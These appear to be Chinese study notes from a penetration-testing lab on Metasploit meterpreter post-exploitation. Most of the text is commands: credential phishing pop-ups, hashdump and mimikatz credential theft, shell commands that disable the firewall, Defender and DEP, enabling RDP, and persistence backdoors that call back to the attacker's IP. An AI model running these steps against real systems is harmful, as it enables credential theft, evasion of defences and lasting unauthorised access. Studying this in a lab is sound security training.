meterpreter
本部分使用Kali系统
host注入
在meterpreter中先使用background将当前连接挂起
show options 查看配置方法
set ip [自己的ip] 这里的ip是之后目标指向的ip
set domain [要篡改的域名] 要伪造什么域名
set sessions [目标session] 对哪个session id进行修改
run 运行
用户认证钓鱼
run post/windows/gather/phish_windows_credentials
会在目标桌面弹出管理员认证窗口
passTheHash
必须是system权限
run post/windows/gather/hashdump 获取操作系统的hash值
可以获取管理员(Administrator)密码加密之后的密码,之后使用穷举的方法破解
mimikatz(Windows版)
本部分使用Win10攻击机及Win7靶机
我们使用C:\tools\alltools\密码破解下的mimikatz_trunk.rar软件,将压缩包传入到靶机上并解压,如果不能直接拖动复制(没有安装VM tools)建议使用 免费在线文件传输工具 - 零代码快传
解压后文件夹内的双击两个快捷方式可一键执行命令,也可进入Win32或x64文件夹(分别对应32和64位)内打开软件控制台手动输入命令
获取账户密码
其中,在Win32文件夹内有常用命令.txt可供参考:
|
|
我们依次执行前三个命令,这时会在wdigest后显示密码
提示:Windows 8 前密码会以明文形式存储在内存中,因此直接获取明文只对Win8之前有效。
扫雷外挂(?)
打开位于tools文件夹下的winmine.exe
在mimikatz窗口中执行命令winmine::infos,即可查看所有雷的位置
mimikatz(Kali版)
本部分继续使用meterpreter控制台
在一个已连接的session中输入load mimikatz(如果失败请用load kiwi)加载mimikatz模块
使用help(失败请用help kiwi)可以查看有哪些功能,例如:
creds_all列出所有凭据
creds_kerberos 拿到Kerberos凭据
creds_msv获取加密后的密码(Win8之后适用)
防火墙和3389端口
本部分继续使用meterpreter控制台
安全措施的处理
在shell中:
netsh advfirewall set allprofiles state off 关闭防火墙
net stop windefend 关闭defener(Windows自带杀软)
bcdedit.exe /set {current} nx AlwaysOff 关闭dep(数据执行保护)
在meterpreter中(不好用):
run killav 关闭杀软
或run post/windows/manage/killav
开启3389(远程桌面)端口
run post/windows/manage/enable_rdp 打开3389端口
或
run getgui -e (不太靠谱)
run getgui -u 用户名 -p 密码 在目标上创建新的用户账户(不好用)
连接远程桌面
不要在meterpreter中输入,直接在新的终端窗口中输入:
rdesktop -u [用户名] -p [密码] [目标ip] 使用图形界面控制远程桌面
永久后门植入
为什么需要永久后门的植入?
meterpreter是运行在内存里的,重启消失,所以需要植入后门
常见方法:卸载对方的补丁,给对方安装一些有漏洞的软件(比如说ftp程序、输入法……)
这里使用meterpreter自带的功能
方法一(正向连接,不一定成功)
安装服务
background 挂起连接
run metsvc -A 设定一个31337端口上传后门文件
查看服务
jobs 可以看到metsvc_bind_tcp
连接
|
|
方法二(反向连接)
课上教的(不可用,原因未知)
植入启动型后门
在session中:
run persistence -A -S -U -i [多少秒联系一次] -p [端口号] -r [自己的ip] 植入启动型后门
或者
run persistence -X -i [多少秒联系一次] -p [端口号] -r [自己的ip] (成功率更高)
会打开一个新的session,之后目标启动后会自动连接上控制端
实践可用
|
|